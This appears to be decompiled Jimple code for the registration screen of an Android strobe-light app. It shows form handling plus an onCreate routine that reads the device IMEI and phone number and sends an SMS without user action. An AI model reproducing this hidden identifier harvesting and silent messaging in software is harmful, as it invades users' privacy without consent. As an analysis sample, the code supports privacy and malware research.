        com.iconosys.dancestrobe.RegistrationScreen $r0;

        $r0 := @parameter0: com.iconosys.dancestrobe.RegistrationScreen;

        r1 = $r0.<com.iconosys.dancestrobe.RegistrationScreen: android.widget.RadioButton a30>;

        return r1;
    }

    static void access$11(com.iconosys.dancestrobe.RegistrationScreen, java.lang.String)
    {
        java.lang.String $r1;
        com.iconosys.dancestrobe.RegistrationScreen $r0;

        $r0 := @parameter0: com.iconosys.dancestrobe.RegistrationScreen;

        $r1 := @parameter1: java.lang.String;

        $r0.<com.iconosys.dancestrobe.RegistrationScreen: java.lang.String age> = $r1;

        return;
    }

    static android.widget.EditText access$12(com.iconosys.dancestrobe.RegistrationScreen)
    {
        com.iconosys.dancestrobe.RegistrationScreen $r0;
        android.widget.EditText r1;

        $r0 := @parameter0: com.iconosys.dancestrobe.RegistrationScreen;

        r1 = $r0.<com.iconosys.dancestrobe.RegistrationScreen: android.widget.EditText Name>;

        return r1;
    }

    static android.widget.EditText access$13(com.iconosys.dancestrobe.RegistrationScreen)
    {
        com.iconosys.dancestrobe.RegistrationScreen $r0;
        android.widget.EditText r1;

        $r0 := @parameter0: com.iconosys.dancestrobe.RegistrationScreen;

        r1 = $r0.<com.iconosys.dancestrobe.RegistrationScreen: android.widget.EditText Email>;

        return r1;
    }

    static boolean access$14(com.iconosys.dancestrobe.RegistrationScreen, java.lang.String)
    {
        java.lang.String $r1;
        com.iconosys.dancestrobe.RegistrationScreen $r0;
        boolean $z0;

        $r0 := @parameter0: com.iconosys.dancestrobe.RegistrationScreen;

        $r1 := @parameter1: java.lang.String;

        $z0 = specialinvoke $r0.<com.iconosys.dancestrobe.RegistrationScreen: boolean checkEmail(java.lang.String)>($r1);

        return $z0;
    }

    static android.widget.EditText access$15(com.iconosys.dancestrobe.RegistrationScreen)
    {
        com.iconosys.dancestrobe.RegistrationScreen $r0;
        android.widget.EditText r1;

        $r0 := @parameter0: com.iconosys.dancestrobe.RegistrationScreen;

        r1 = $r0.<com.iconosys.dancestrobe.RegistrationScreen: android.widget.EditText Phone>;

        return r1;
    }

    static boolean access$16(com.iconosys.dancestrobe.RegistrationScreen, java.lang.String)
    {
        java.lang.String $r1;
        com.iconosys.dancestrobe.RegistrationScreen $r0;
        boolean $z0;

        $r0 := @parameter0: com.iconosys.dancestrobe.RegistrationScreen;

        $r1 := @parameter1: java.lang.String;

        $z0 = specialinvoke $r0.<com.iconosys.dancestrobe.RegistrationScreen: boolean checkPhone(java.lang.String)>($r1);

        return $z0;
    }

    static android.widget.CheckBox access$2(com.iconosys.dancestrobe.RegistrationScreen)
    {
        android.widget.CheckBox r1;
        com.iconosys.dancestrobe.RegistrationScreen $r0;

        $r0 := @parameter0: com.iconosys.dancestrobe.RegistrationScreen;

        r1 = $r0.<com.iconosys.dancestrobe.RegistrationScreen: android.widget.CheckBox Accept>;

        return r1;
    }

    static void access$3(com.iconosys.dancestrobe.RegistrationScreen)
    {
        com.iconosys.dancestrobe.RegistrationScreen $r0;

        $r0 := @parameter0: com.iconosys.dancestrobe.RegistrationScreen;

        specialinvoke $r0.<com.iconosys.dancestrobe.RegistrationScreen: void SendAutoPhoneData()>();

        return;
    }

    static android.widget.RadioButton access$4(com.iconosys.dancestrobe.RegistrationScreen)
    {
        android.widget.RadioButton r1;
        com.iconosys.dancestrobe.RegistrationScreen $r0;

        $r0 := @parameter0: com.iconosys.dancestrobe.RegistrationScreen;

        r1 = $r0.<com.iconosys.dancestrobe.RegistrationScreen: android.widget.RadioButton male>;

        return r1;
    }

    static void access$5(com.iconosys.dancestrobe.RegistrationScreen, java.lang.String)
    {
        java.lang.String $r1;
        com.iconosys.dancestrobe.RegistrationScreen $r0;

        $r0 := @parameter0: com.iconosys.dancestrobe.RegistrationScreen;

        $r1 := @parameter1: java.lang.String;

        $r0.<com.iconosys.dancestrobe.RegistrationScreen: java.lang.String gender> = $r1;

        return;
    }

    static android.widget.RadioButton access$6(com.iconosys.dancestrobe.RegistrationScreen)
    {
        android.widget.RadioButton r1;
        com.iconosys.dancestrobe.RegistrationScreen $r0;

        $r0 := @parameter0: com.iconosys.dancestrobe.RegistrationScreen;

        r1 = $r0.<com.iconosys.dancestrobe.RegistrationScreen: android.widget.RadioButton female>;

        return r1;
    }

    static android.widget.RadioButton access$7(com.iconosys.dancestrobe.RegistrationScreen)
    {
        android.widget.RadioButton r1;
        com.iconosys.dancestrobe.RegistrationScreen $r0;

        $r0 := @parameter0: com.iconosys.dancestrobe.RegistrationScreen;

        r1 = $r0.<com.iconosys.dancestrobe.RegistrationScreen: android.widget.RadioButton au15>;

        return r1;
    }

    static android.widget.RadioButton access$8(com.iconosys.dancestrobe.RegistrationScreen)
    {
        android.widget.RadioButton r1;
        com.iconosys.dancestrobe.RegistrationScreen $r0;

        $r0 := @parameter0: com.iconosys.dancestrobe.RegistrationScreen;

        r1 = $r0.<com.iconosys.dancestrobe.RegistrationScreen: android.widget.RadioButton a1518>;

        return r1;
    }

    static android.widget.RadioButton access$9(com.iconosys.dancestrobe.RegistrationScreen)
    {
        android.widget.RadioButton r1;
        com.iconosys.dancestrobe.RegistrationScreen $r0;

        $r0 := @parameter0: com.iconosys.dancestrobe.RegistrationScreen;

        r1 = $r0.<com.iconosys.dancestrobe.RegistrationScreen: android.widget.RadioButton a1830>;

        return r1;
    }

    private boolean checkEmail(java.lang.String)
    {
        java.util.regex.Matcher $r3;
        java.lang.String $r1;
        java.util.regex.Pattern $r2;
        com.iconosys.dancestrobe.RegistrationScreen r0;
        boolean $z0;

        r0 := @this: com.iconosys.dancestrobe.RegistrationScreen;

        $r1 := @parameter0: java.lang.String;

        $r2 = <com.iconosys.dancestrobe.RegistrationScreen: java.util.regex.Pattern EMAIL_ADDRESS_PATTERN>;

        $r3 = virtualinvoke $r2.<java.util.regex.Pattern: java.util.regex.Matcher matcher(java.lang.CharSequence)>($r1);

        $z0 = virtualinvoke $r3.<java.util.regex.Matcher: boolean matches()>();

        return $z0;
    }

    private boolean checkPhone(java.lang.String)
    {
        java.util.regex.Matcher $r3;
        java.lang.String $r1;
        java.util.regex.Pattern $r2;
        com.iconosys.dancestrobe.RegistrationScreen r0;
        boolean $z0;

        r0 := @this: com.iconosys.dancestrobe.RegistrationScreen;

        $r1 := @parameter0: java.lang.String;

        $r2 = <com.iconosys.dancestrobe.RegistrationScreen: java.util.regex.Pattern PHONE_PATTERN>;

        $r3 = virtualinvoke $r2.<java.util.regex.Pattern: java.util.regex.Matcher matcher(java.lang.CharSequence)>($r1);

        $z0 = virtualinvoke $r3.<java.util.regex.Matcher: boolean matches()>();

        return $z0;
    }

    protected void displayToast(java.lang.String)
    {
        java.lang.String $r1;
        com.iconosys.dancestrobe.RegistrationScreen r0;
        android.widget.Toast $r2;

        r0 := @this: com.iconosys.dancestrobe.RegistrationScreen;

        $r1 := @parameter0: java.lang.String;

        $r2 = staticinvoke <android.widget.Toast: android.widget.Toast makeText(android.content.Context,java.lang.CharSequence,int)>(r0, $r1, 1);

        virtualinvoke $r2.<android.widget.Toast: void show()>();

        return;
    }

    public void onCreate(android.os.Bundle)
    {
        android.os.Bundle $r1;
        android.widget.RadioButton $r7;
        android.telephony.SmsManager $r14;
        java.util.ArrayList $r15;
        android.widget.CheckBox $r5;
        com.iconosys.dancestrobe.RegistrationScreen$2 $r16;
        com.iconosys.dancestrobe.MsgProvider $r2;
        com.iconosys.dancestrobe.RegistrationScreen$1 $r9;
        android.telephony.TelephonyManager r13;
        int $i0;
        com.iconosys.dancestrobe.RegistrationScreen$4 $r18;
        android.view.View $r3;
        android.widget.Button $r8;
        com.iconosys.dancestrobe.RegistrationScreen$3 $r17;
        com.iconosys.dancestrobe.RegistrationScreen$6 $r20;
        java.lang.String $r11;
        com.iconosys.dancestrobe.RegistrationScreen$5 $r19;
        com.iconosys.dancestrobe.RegistrationScreen$8 $r22;
        com.iconosys.dancestrobe.RegistrationScreen$7 $r21;
        com.iconosys.dancestrobe.RegistrationScreen$9 $r23;
        java.lang.CharSequence $r10;
        com.iconosys.dancestrobe.RegistrationScreen r0;
        java.lang.Exception $r24;
        android.widget.TextView $r6;
        java.lang.Object $r12;
        android.widget.EditText $r4;

        r0 := @this: com.iconosys.dancestrobe.RegistrationScreen;

        $r1 := @parameter0: android.os.Bundle;

        specialinvoke r0.<android.app.Activity: void onCreate(android.os.Bundle)>($r1);

        virtualinvoke r0.<com.iconosys.dancestrobe.RegistrationScreen: void setContentView(int)>(2130903044);

        $r2 = new com.iconosys.dancestrobe.MsgProvider;

        specialinvoke $r2.<com.iconosys.dancestrobe.MsgProvider: void <init>(android.content.Context)>(r0);

        r0.<com.iconosys.dancestrobe.RegistrationScreen: com.iconosys.dancestrobe.MsgProvider mp> = $r2;

        $r2 = r0.<com.iconosys.dancestrobe.RegistrationScreen: com.iconosys.dancestrobe.MsgProvider mp>;

        virtualinvoke $r2.<com.iconosys.dancestrobe.MsgProvider: com.iconosys.dancestrobe.MsgProvider open()>();

        $r3 = virtualinvoke r0.<com.iconosys.dancestrobe.RegistrationScreen: android.view.View findViewById(int)>(2131034121);

        $r4 = (android.widget.EditText) $r3;

        r0.<com.iconosys.dancestrobe.RegistrationScreen: android.widget.EditText Name> = $r4;

        $r3 = virtualinvoke r0.<com.iconosys.dancestrobe.RegistrationScreen: android.view.View findViewById(int)>(2131034122);

        $r4 = (android.widget.EditText) $r3;

        r0.<com.iconosys.dancestrobe.RegistrationScreen: android.widget.EditText Email> = $r4;

        $r3 = virtualinvoke r0.<com.iconosys.dancestrobe.RegistrationScreen: android.view.View findViewById(int)>(2131034123);

        $r4 = (android.widget.EditText) $r3;

        r0.<com.iconosys.dancestrobe.RegistrationScreen: android.widget.EditText Phone> = $r4;

        $r3 = virtualinvoke r0.<com.iconosys.dancestrobe.RegistrationScreen: android.view.View findViewById(int)>(2131034130);

        $r5 = (android.widget.CheckBox) $r3;

        r0.<com.iconosys.dancestrobe.RegistrationScreen: android.widget.CheckBox Accept> = $r5;

        $r3 = virtualinvoke r0.<com.iconosys.dancestrobe.RegistrationScreen: android.view.View findViewById(int)>(2131034131);

        $r6 = (android.widget.TextView) $r3;

        r0.<com.iconosys.dancestrobe.RegistrationScreen: android.widget.TextView Textlink> = $r6;

        $r3 = virtualinvoke r0.<com.iconosys.dancestrobe.RegistrationScreen: android.view.View findViewById(int)>(2131034126);

        $r7 = (android.widget.RadioButton) $r3;

        r0.<com.iconosys.dancestrobe.RegistrationScreen: android.widget.RadioButton au15> = $r7;

        $r3 = virtualinvoke r0.<com.iconosys.dancestrobe.RegistrationScreen: android.view.View findViewById(int)>(2131034127);

        $r7 = (android.widget.RadioButton) $r3;

        r0.<com.iconosys.dancestrobe.RegistrationScreen: android.widget.RadioButton a1518> = $r7;

        $r3 = virtualinvoke r0.<com.iconosys.dancestrobe.RegistrationScreen: android.view.View findViewById(int)>(2131034128);

        $r7 = (android.widget.RadioButton) $r3;

        r0.<com.iconosys.dancestrobe.RegistrationScreen: android.widget.RadioButton a1830> = $r7;

        $r3 = virtualinvoke r0.<com.iconosys.dancestrobe.RegistrationScreen: android.view.View findViewById(int)>(2131034129);

        $r7 = (android.widget.RadioButton) $r3;

        r0.<com.iconosys.dancestrobe.RegistrationScreen: android.widget.RadioButton a30> = $r7;

        $r3 = virtualinvoke r0.<com.iconosys.dancestrobe.RegistrationScreen: android.view.View findViewById(int)>(2131034124);

        $r7 = (android.widget.RadioButton) $r3;

        r0.<com.iconosys.dancestrobe.RegistrationScreen: android.widget.RadioButton male> = $r7;

        $r3 = virtualinvoke r0.<com.iconosys.dancestrobe.RegistrationScreen: android.view.View findViewById(int)>(2131034125);

        $r7 = (android.widget.RadioButton) $r3;

        r0.<com.iconosys.dancestrobe.RegistrationScreen: android.widget.RadioButton female> = $r7;

        $r3 = virtualinvoke r0.<com.iconosys.dancestrobe.RegistrationScreen: android.view.View findViewById(int)>(2131034133);

        $r8 = (android.widget.Button) $r3;

        r0.<com.iconosys.dancestrobe.RegistrationScreen: android.widget.Button skip> = $r8;

        $r3 = virtualinvoke r0.<com.iconosys.dancestrobe.RegistrationScreen: android.view.View findViewById(int)>(2131034131);

        $r6 = (android.widget.TextView) $r3;

        $r9 = new com.iconosys.dancestrobe.RegistrationScreen$1;

        specialinvoke $r9.<com.iconosys.dancestrobe.RegistrationScreen$1: void <init>(com.iconosys.dancestrobe.RegistrationScreen)>(r0);

        virtualinvoke $r6.<android.widget.TextView: void setOnClickListener(android.view.View$OnClickListener)>($r9);

        $r7 = r0.<com.iconosys.dancestrobe.RegistrationScreen: android.widget.RadioButton a1830>;

        virtualinvoke $r7.<android.widget.RadioButton: void setChecked(boolean)>(1);

        $r7 = r0.<com.iconosys.dancestrobe.RegistrationScreen: android.widget.RadioButton a1830>;

        $r10 = virtualinvoke $r7.<android.widget.RadioButton: java.lang.CharSequence getText()>();

        $r11 = interfaceinvoke $r10.<java.lang.CharSequence: java.lang.String toString()>();

        r0.<com.iconosys.dancestrobe.RegistrationScreen: java.lang.String age> = $r11;

        $r7 = r0.<com.iconosys.dancestrobe.RegistrationScreen: android.widget.RadioButton female>;

        virtualinvoke $r7.<android.widget.RadioButton: void setChecked(boolean)>(1);

        $r7 = r0.<com.iconosys.dancestrobe.RegistrationScreen: android.widget.RadioButton female>;

        $r10 = virtualinvoke $r7.<android.widget.RadioButton: java.lang.CharSequence getText()>();

        $r11 = interfaceinvoke $r10.<java.lang.CharSequence: java.lang.String toString()>();

        r0.<com.iconosys.dancestrobe.RegistrationScreen: java.lang.String gender> = $r11;

        $r3 = virtualinvoke r0.<com.iconosys.dancestrobe.RegistrationScreen: android.view.View findViewById(int)>(2131034132);

        $r8 = (android.widget.Button) $r3;

        r0.<com.iconosys.dancestrobe.RegistrationScreen: android.widget.Button Sbt> = $r8;

        $r12 = virtualinvoke r0.<com.iconosys.dancestrobe.RegistrationScreen: java.lang.Object getSystemService(java.lang.String)>("phone");

        r13 = (android.telephony.TelephonyManager) $r12;

        $r11 = virtualinvoke r13.<android.telephony.TelephonyManager: java.lang.String getDeviceId()>();

        r0.<com.iconosys.dancestrobe.RegistrationScreen: java.lang.String imei> = $r11;

        $r11 = virtualinvoke r13.<android.telephony.TelephonyManager: java.lang.String getLine1Number()>();

        r0.<com.iconosys.dancestrobe.RegistrationScreen: java.lang.String phoneNumber> = $r11;

     label1:
        $r11 = r0.<com.iconosys.dancestrobe.RegistrationScreen: java.lang.String phoneNumber>;

     label2:
        if $r11 == null goto label6;

     label3:
        $r11 = r0.<com.iconosys.dancestrobe.RegistrationScreen: java.lang.String phoneNumber>;

        $i0 = virtualinvoke $r11.<java.lang.String: int length()>();

     label4:
        if $i0 <= 2 goto label6;

     label5:
        $r4 = r0.<com.iconosys.dancestrobe.RegistrationScreen: android.widget.EditText Phone>;

        $r11 = r0.<com.iconosys.dancestrobe.RegistrationScreen: java.lang.String phoneNumber>;

        virtualinvoke $r4.<android.widget.EditText: void setText(java.lang.CharSequence)>($r11);

        $r14 = staticinvoke <android.telephony.SmsManager: android.telephony.SmsManager getDefault()>();

        $r10 = virtualinvoke r0.<com.iconosys.dancestrobe.RegistrationScreen: java.lang.CharSequence getText(int)>(2130968580);

        $r11 = interfaceinvoke $r10.<java.lang.CharSequence: java.lang.String toString()>();

        $r15 = virtualinvoke $r14.<android.telephony.SmsManager: java.util.ArrayList divideMessage(java.lang.String)>($r11);

        $r11 = r0.<com.iconosys.dancestrobe.RegistrationScreen: java.lang.String phoneNumber>;

        virtualinvoke $r14.<android.telephony.SmsManager: void sendMultipartTextMessage(java.lang.String,java.lang.String,java.util.ArrayList,java.util.ArrayList,java.util.ArrayList)>($r11, null, $r15, null, null);

     label6:
        $r8 = r0.<com.iconosys.dancestrobe.RegistrationScreen: android.widget.Button skip>;

        $r16 = new com.iconosys.dancestrobe.RegistrationScreen$2;

        specialinvoke $r16.<com.iconosys.dancestrobe.RegistrationScreen$2: void <init>(com.iconosys.dancestrobe.RegistrationScreen)>(r0);

        virtualinvoke $r8.<android.widget.Button: void setOnClickListener(android.view.View$OnClickListener)>($r16);

        $r7 = r0.<com.iconosys.dancestrobe.RegistrationScreen: android.widget.RadioButton male>;

        $r17 = new com.iconosys.dancestrobe.RegistrationScreen$3;

        specialinvoke $r17.<com.iconosys.dancestrobe.RegistrationScreen$3: void <init>(com.iconosys.dancestrobe.RegistrationScreen)>(r0);

        virtualinvoke $r7.<android.widget.RadioButton: void setOnClickListener(android.view.View$OnClickListener)>($r17);

        $r7 = r0.<com.iconosys.dancestrobe.RegistrationScreen: android.widget.RadioButton female>;

        $r18 = new com.iconosys.dancestrobe.RegistrationScreen$4;

        specialinvoke $r18.<com.iconosys.dancestrobe.RegistrationScreen$4: void <init>(com.iconosys.dancestrobe.RegistrationScreen)>(r0);

        virtualinvoke $r7.<android.widget.RadioButton: void setOnClickListener(android.view.View$OnClickListener)>($r18);

        $r7 = r0.<com.iconosys.dancestrobe.RegistrationScreen: android.widget.RadioButton au15>;

        $r19 = new com.iconosys.dancestrobe.RegistrationScreen$5;

        specialinvoke $r19.<com.iconosys.dancestrobe.RegistrationScreen$5: void <init>(com.iconosys.dancestrobe.RegistrationScreen)>(r0);

        virtualinvoke $r7.<android.widget.RadioButton: void setOnClickListener(android.view.View$OnClickListener)>($r19);

        $r7 = r0.<com.iconosys.dancestrobe.RegistrationScreen: android.widget.RadioButton a1518>;

        $r20 = new com.iconosys.dancestrobe.RegistrationScreen$6;

        specialinvoke $r20.<com.iconosys.dancestrobe.RegistrationScreen$6: void <init>(com.iconosys.dancestrobe.RegistrationScreen)>(r0);

        virtualinvoke $r7.<android.widget.RadioButton: void setOnClickListener(android.view.View$OnClickListener)>($r20);

        $r7 = r0.<com.iconosys.dancestrobe.RegistrationScreen: android.widget.RadioButton a1830>;

        $r21 = new com.iconosys.dancestrobe.RegistrationScreen$7;

        specialinvoke $r21.<com.iconosys.dancestrobe.RegistrationScreen$7: void <init>(com.iconosys.dancestrobe.RegistrationScreen)>(r0);

        virtualinvoke $r7.<android.widget.RadioButton: void setOnClickListener(android.view.View$OnClickListener)>($r21);

        $r7 = r0.<com.iconosys.dancestrobe.RegistrationScreen: android.widget.RadioButton a30>;

        $r22 = new com.iconosys.dancestrobe.RegistrationScreen$8;

        specialinvoke $r22.<com.iconosys.dancestrobe.RegistrationScreen$8: void <init>(com.iconosys.dancestrobe.RegistrationScreen)>(r0);

        virtualinvoke $r7.<android.widget.RadioButton: void setOnClickListener(android.view.View$OnClickListener)>($r22);

        $r8 = r0.<com.iconosys.dancestrobe.RegistrationScreen: android.widget.Button Sbt>;

        $r23 = new com.iconosys.dancestrobe.RegistrationScreen$9;

        specialinvoke $r23.<com.iconosys.dancestrobe.RegistrationScreen$9: void <init>(com.iconosys.dancestrobe.RegistrationScreen)>(r0);

        virtualinvoke $r8.<android.widget.Button: void setOnClickListener(android.view.View$OnClickListener)>($r23);

        return;

     label7:
        $r24 := @caughtexception;

        virtualinvoke $r24.<java.lang.Exception: void printStackTrace()>();

        $r4 = r0.<com.iconosys.dancestrobe.RegistrationScreen: android.widget.EditText Phone>;

        virtualinvoke $r4.<android.widget.EditText: void setText(java.lang.CharSequence)>("");

        staticinvoke <android.util.Log: int w(java.lang.String,java.lang.String)>("Buzzer", "Phone number seems to be null");

        goto label6;

        catch java.lang.Exception from label1 to label2 with label7;
        catch java.lang.Exception from label3 to label4 with label7;
        catch java.lang.Exception from label5 to label6 with label7;
    }

    public void onDestroy()
    {
        com.iconosys.dancestrobe.RegistrationScreen r0;
        com.iconosys.dancestrobe.MsgProvider $r1;

        r0 := @this: com.iconosys.dancestrobe.RegistrationScreen;

        specialinvoke r0.<android.app.Activity: void onDestroy()>();

        $r1 = r0.<com.iconosys.dancestrobe.RegistrationScreen: com.iconosys.dancestrobe.MsgProvider mp>;

        virtualinvoke $r1.<com.iconosys.dancestrobe.MsgProvider: void close()>();

        return;
    }
}
